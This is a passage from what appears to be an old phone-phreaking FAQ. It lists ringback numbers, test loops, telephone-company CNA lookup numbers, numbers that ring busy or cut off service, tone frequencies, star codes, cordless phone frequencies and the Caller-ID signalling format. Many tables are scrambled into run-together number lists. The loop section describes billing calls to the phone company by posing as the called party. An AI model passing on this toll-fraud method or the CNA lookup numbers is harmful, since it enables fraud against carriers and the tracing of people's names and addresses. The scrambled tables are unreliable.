will immediately ring the telephone from which it was called. In most instances
you must call the ringback number, quickly hang up
the phone for just a short moment and then let up on the switch, you will then go
back off hook and hear a different tone. You may then hang up. You will be called
back seconds later. 13. What is the ringback number for my area? An 'x' means
insert those numbers from the phone number from which you are calling. A '?' means
that the number varies from switch to switch in the area, or changes from time to
time. Try all possible combinations. If the ringback for your NPA is not listed,
try common ones such as 954, 957 and 958. Also, try using the numbers listed for
other NPA's served by your telephone company. NPA --201 202 203 208 213 216 219
219 301 301 303 304 305 312 312 312 315 317 317 319 401 404 407 412 414 414 415
417 501 501 502 503 504 504 505 512 513 513 516 601 Ringback number --------------
55?-xxxx 958-xxxx 99?-xxxx 99xxx-xxxx 1-95x-xxxx 551-XXXX 571-xxx-xxxx 777-xxx-
xxxx 579-xxxx 958-xxxx 99X-xxxx 998-xxxx 999-xxxx 511-xxxx 511-xxx-xxxx 57?-xxxx
98x-xxxx 777-xxxx yyy-xxxx 79x-xxxx 98?-xxxx 450-xxxx 988-xxxx 985-xxxx 977-xxxx
978-xxxx 350-xxxx 551-xxxx 221-xxx-xxxx 721-xxx-xxxx 988 541-XXXX 99x-xxxx
9988776655 59?-xxxx 95X-xxxx 99?-xxxx 955-xxxx 660-xxx-xxxx 777-xxxx Geographic
area --------------------------------------------Hackensack/Jersey
City/Newark/Paterson, NJ District of Columbia CT ID Los Angeles, CA
Akron/Canton/Cleveland/Lorain/Youngstown, OH Gary/Hammond/Michigan City/Southbend,
IN Gary/Hammond/Michigan City/Southbend, IN Hagerstown/Rockville, MD
Hagerstown/Rockville, MD Grand Junction, CO WV Ft. Lauderdale/Key West/Miami, FL
Chicago, IL Chicago, IL Chicago, IL Syracuse/Utica, NY Indianapolis/Kokomo, IN
Indianapolis/Kokomo, IN (y=3rd digit of phone number) Davenport/Dubuque, Iowa RI
Atlanta, GA Orlando/West Palm Beach, FL Pittsburgh, PA Fond du Lac/Green
Bay/Milwaukee/Racine, WI Fond du Lac/Green Bay/Milwaukee/Racine, WI San Francisco,
CA Joplin/Springfield, MO AR AR Frankfort/Louisville/Paducah/Shelbyville, KY OR
Baton Rouge/New Orleans, LA Baton Rouge/New Orleans, LA New Mexico Austin, TX
Cincinnati/Dayton, OH Cincinnati/Dayton, OH Hempstead/Long Island, NY MS
U N N
N N
N
N
609 612 612 614 615 616 619 619 703 708 714 714 716 718 719 801 801 802 804 805
805 810 813 817 906 908 908 913 914
Canada: 416 57x-xxxx 416 99x-xxxx 416 999-xxx-xxxx N 506 572+xxx-xxxx 514 320-xxx-
xxxx 613 999-xxx-xxxx 705 999-xxx-xxxx
Australia: +61 199 U Brazil: 109 or 199 New Zealand: 137 Sweden: 0058 United
Kingdom: 174 or 1744 or 175 or 0500-89-0011 14. What is a loop? This FAQ answer is
excerpted from: ToneLoc v0.99 User Manual by Minor Threat & Mucho Maas Loops are a
pair of phone numbers, usually consecutive, like 836-9998 and 836-9999. They are
used by the phone company for testing. What good do loops do us? Well, they are
cool in a few ways. Here is a simple use of loops. Each loop has two ends, a
'high' end, and a 'low' end. One end gives a (usually) constant, loud tone when it
is called. The other end is silent. Loops don't usually ring either. When BOTH
ends are called, the people that called each end can talk
through the loop. Some loops are voice filtered and won't pass anything but a
constant tone; these aren't much use to you. Here's what you can use working loops
for: billing phone calls! First, call the end that gives the loud tone. Then if
the operator or someone calls the other end, the tone will go quiet. Act like the
phone just rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or what
the fuck ever. The operator thinks that she just called you, and that's it! Now
the phone bill will go to the loop, and your local RBOC will get the bill! Use
this technique in moderation, or the loop may go down. Loops are probably most
useful when you want to talk to someone to whom you don't want to give your phone
number. 15. What is a loop in my area? Many of these loops are no longer
functional. If you are local to any of these loops, please try them out an e-mail
me the results of your research. NPA --201 201 206 206 208 209 201 210 210 210 210
210 212 212 212 212 212 212 212 212 213 213 213 213 213 213 213 214 214 305 305
307 308 310 310 310 310 High -------879-9929 347-9929 827-0018 988-0020 862-9996
732-0044 666-9929 993-9929 330-9929 333-9929 376-9929 467-9929 220-9977 283-9977
283-9977 352-9900 365-9977 529-9900 562-9977 986-9977 360-1118 365-1118 455-0002
455-0002 546-0002 546-0002 549-1118 291-4759 299-4759 778-9952 964-9951 468-9999
357-0004 365-1118 445-0002 455-0002 545-0002 Low -------879-9930 347-9930 827-0019
988-0022 862-9997 732-0045 666-9930 993-9930 330-9930 333-9930 376-9930 467-9930
220-9979 283-9979 283-9997 352-9906 365-9979 529-9906 562-9979 986-9979 360-1119
365-1119 455-XXXX 455-xxxx 546-XXXX 546-xxxx 549-1119 291-4757 299-4757 778-9951
964-9952 468-9998 357-0005 365-1119 445-???? 455-???? 545-????
N N N N N
N N N N
N 310 N 312 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313
313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313
313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313 313
16. What is a CNA number? CNA stands for Customer Name and Address. The CNA number
is a phone number for telephone company personnel to call and get the name and
address for a phone number. If a telephone lineman finds a phone line he does not
recognize, he can use the ANI number to find its phone number and then call the
CNA operator to see who owns it and where they live. Normal CNA numbers are
available only to telephone company personnel. Private citizens may legally get
CNA information from private companies. Two such companies are: Unidirectory
Telename (900)933-3330 (900)884-1212
Note that these are 900 numbers, and will cost you approximately one dollar per
minute. If you are in 312 or 708, AmeriTech has a pay-for-play CNA service
available to the general public. The number is 796-9600. The cost is
$.35/call and can look up two numbers per call. If you are in 415, Pacific Bell
offers a public access CNA service at (415)781-5271. 17. What is the telephone
company CNA number for my area? 203 513 516 N 518 614 813 (203)771-8080 (513)397-
9110 (516)321-5700 (518)471-8111 (614)464-0123 (813)270-8711 CT Cincinnati/Dayton,
OH Hempstead/Long Island, NY Albany/Schenectady/Troy, NY Columbus/Steubenville, OH
Ft. Meyers/St. Petersburg/Tampa, FL
18. What are some numbers that always ring busy? 216 N 303 N 303 316 501 719 805
818 906 906 914 xxx-9887 431-0000 866-8660 952-7265 377-99xx 472-3773 255-0699
885-0699 632-9999 635-9999 576-9903 Akron/Canton/Cleveland/Lorain/Youngstown, OH
Denver, CO Denver, CO Dodge City/Wichita, KS AR Colorado Springs/Leadville/Pueblo,
CO Bakersfield/Santa Barbara, CA Pasadena, CA Marquette/Sault Ste. Marie, MI
Marquette/Sault Ste. Marie, MI Peekskill/Poughkeepsie/White Plains/Yonkers, NY
19. What are some numbers that temporarily disconnect phone service? 314 404 405
407 512 516 603 N 614 N 805 919 511 420 953 511 200 480 980 xxx-9894 119 211 or
511 Columbia/Jefferson City/St.Louis, MO (1 minute) Atlanta, GA (5 minutes)
Enid/Oklahoma City, OK (1 minute) Orlando/West Palm Beach, FL (1 minute)
Austin/Corpus Christi, TX (1 minute) Hempstead/Long Island, NY (1 minute) NH
Columbus/Steubenville, OH Bakersfield/Santa Barbara, CA (3 minutes) Durham, NC (10
min - 1 hour)
24. What are the frequencies of the telephone tones? Type Hz On Off
--------------------------------------------------------------------Dial Tone 350
& 400 ----Busy Signal 480 & 620 0.5 0.5 Toll Congestion 480 & 620 0.2 0.3 Ringback
(Normal) 440 & 480 2.0 4.0 Ringback (PBX) 440 & 480 1.5 4.5 Reorder (Local) 480 &
620 3.0 2.0 Invalid Number 200 & 400 Hang Up Warning 1400 & 2060 0.1 0.1 Hang Up
2450 & 2600 ----25. What are all of the * (LASS) codes? Local Area Signalling
Services (LASS) and Custom Calling Feature Control Codes: (These appear to be
standard, but may be changed locally) Service Tone Pulse/rotary Notes
-------------------------------------------------------------------------
Assistance/Police *12 n/a [1] Cancel forwarding *30 n/a [C1] Automatic Forwarding
*31 n/a [C1] Notify *32 n/a [C1] [2] Intercom Ring 1 (..) *51 1151 [3] Intercom
Ring 2 (.._) *52 1152 [3] Intercom Ring 3 (._.) *53 1153 [3] Extension Hold *54
1154 [3] Customer Originated Trace *57 1157 Selective Call Rejection *60 1160 (or
Call Screen) Selective Distinct Alert *61 1161 Selective Call Acceptance *62 1162
Selective Call Forwarding *63 1163 ICLID Activation *65 1165 Call Return
(outgoing) *66 1166 Number Display Blocking *67 1167 [4] Computer Access
Restriction *68 1168 Call Return (incoming) *69 1169 Call Waiting disable *70 1170
[4] No Answer Call Transfer *71 1171 Usage Sensitive 3 way call *71 1171 Call
Forwarding: start *72 or 72# 1172 Call Forwarding: cancel *73 or 73# 1173 Speed
Calling (8 numbers) *74 or 74# 1174 Speed Calling (30 numbers) *75 or 75# 1175
Anonymous Call Rejection *77 1177 [5] [M: *58] Call Screen Disable *80 1160 (or
Call Screen) [M: *50] Selective Distinct Disable *81 1161 [M: *51] Select.
Acceptance Disable *82 1162 Select. Forwarding Disable *83 1163 [M: *53]
ICLID Disable Call Return (cancel out) Anon. Call Reject (cancel) Call Return
(cancel in) Notes: [C1] [1] [2] [3] [4] [5] -
Means code used for Cellular One service for cellular in Pittsburgh, PA A/C 412 in
some areas indicates that you are not local and maybe how to reach you found in
Pac Bell territory; Intercom ring causes a distinctive ring to be generated on the
current line; Hold keeps a call connected until another extension is picked up
applied once before each call A.C.R. blocks calls from those who blocked Caller ID
(used in C&P territory, for instance) cancels further return attempts alternate
code used for MLVP (multi-line variety package) by Bellcore. It goes by different
names in different RBOCs. In Bellsouth it is called Prestige. It is an arrangement
of ESSEX like features for single or small multiple line groups. The reason for
different codes for some features in MLVP is that call-pickup is *8 in MLVP so all
*8x codes are reaasigned *5x
26. What frequencies do cordless phones operate on? Here are the frequencies for
the first generation 46/49mhz phones. The new 900mhz cordless phones are not
covered. Channel ------1 2 3 4 5 6 7 8 9 10 Handset Transmit ---------------
49.670mhz 49.845 49.860 49.770 49.875 49.830 49.890 49.930 49.990 49.970 Base
Transmit ------------46.610mhz 46.630 46.670 46.710 46.730 46.770 46.830 46.870
46.930 46.970
27. What is Caller-ID? This FAQ answer is stolen from Rockewell: Calling Number
Delivery (CND), better known as Caller ID, is a telephone service intended for
residential and small business customers. It allows the called Customer Premises
Equipment (CPE) to receive a calling party's directory number and the date and
time of the call during the first 4 second silent interval in the ringing cycle.
Parameters ~~~~~~~~~~
The data signalling interface has the following characteristics: Link Type:
Transmission Scheme: Logical 1 (mark) Logical 0 (space) Transmission Rate:
Transmission Level: 2-wire, simplex Analog, phase-coherent FSK 1200 +/- 12 Hz 2200
+/- 22 Hz 1200 bps 13.5 +/- dBm into 900 ohm load
Protocol ~~~~~~~~ The protocol uses 8-bit data words (bytes), each bounded by a
start bit and a stop bit. The CND message uses the Single Data Message format
shown below. | Channel | Seizure | Signal | | | Carrier Signal | | | Message Type
Word | | | Message Length Word | | | Data Word(s) | Checksum | | Word | | |